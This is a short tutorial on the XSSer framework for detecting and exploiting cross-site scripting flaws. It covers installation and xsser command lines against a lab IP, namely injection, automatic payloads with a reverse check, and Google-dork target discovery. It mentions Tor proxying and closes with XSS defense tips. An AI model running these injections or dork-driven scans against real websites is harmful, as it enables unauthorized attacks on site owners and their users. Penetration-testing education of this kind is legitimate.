Use XSSer Automated Framework to Detect, Exploit and Report XSS Vulnerabilities
XSS is a very commonly exploited vulnerability type which is very widely spread and easily detectable.
Cross Site “Scripter” (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.
Also Learn: XSSight – Automated XSS Scanner And Payload Injector
XSSer runs on many platforms. It requires Python and the following libraries:
- python-pycurl - Python bindings to libcurl- python-xmlbuilder - create xml/(x)html files - Python 2.x- python-beautifulsoup - error-tolerant HTML parser for Python- python-geoip - Python bindings for the GeoIP IP-to-country resolver library
To install on Debian-based systemssudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
To list all the features XSSer Package xsser -hroot@kali:~# xsser -h
To launch a simple Injection attackroot@kali:~# xsser -u “https://192.168.169.130/xss/example1.php?name=hacker”
Injection from Dork, by selecting “google” as search engine:root@kali:~# xsser –De “google” -d “search.php?q=”
To perform Multiple injections from URL, with automatic payload, establishing a reverse connection.xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –auto –reverse-check -s
Simple URL Injection, using GET, injecting on Cookie and using DOM shadow
Parameter filtering with heuristicsroot@kali:~# xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –heuristic
To Launch GUI Interfaceroot@kali:~# xsser –gtk
You can also use TOR proxy with XSSer.
- Injection with both GET and POST methods.
- Includes various filters and bypassing techniques.
- can be used both with the command line and GUI.
- Will provide detailed stats of the attack.
Common Defenses against XSS
- What input do we trust?
- Does it adhere to expected patterns?
- Never simply reflect untrusted data.
- Applies to data within our database too.
- Encoding of context(Java/attribute/HTML/CSS).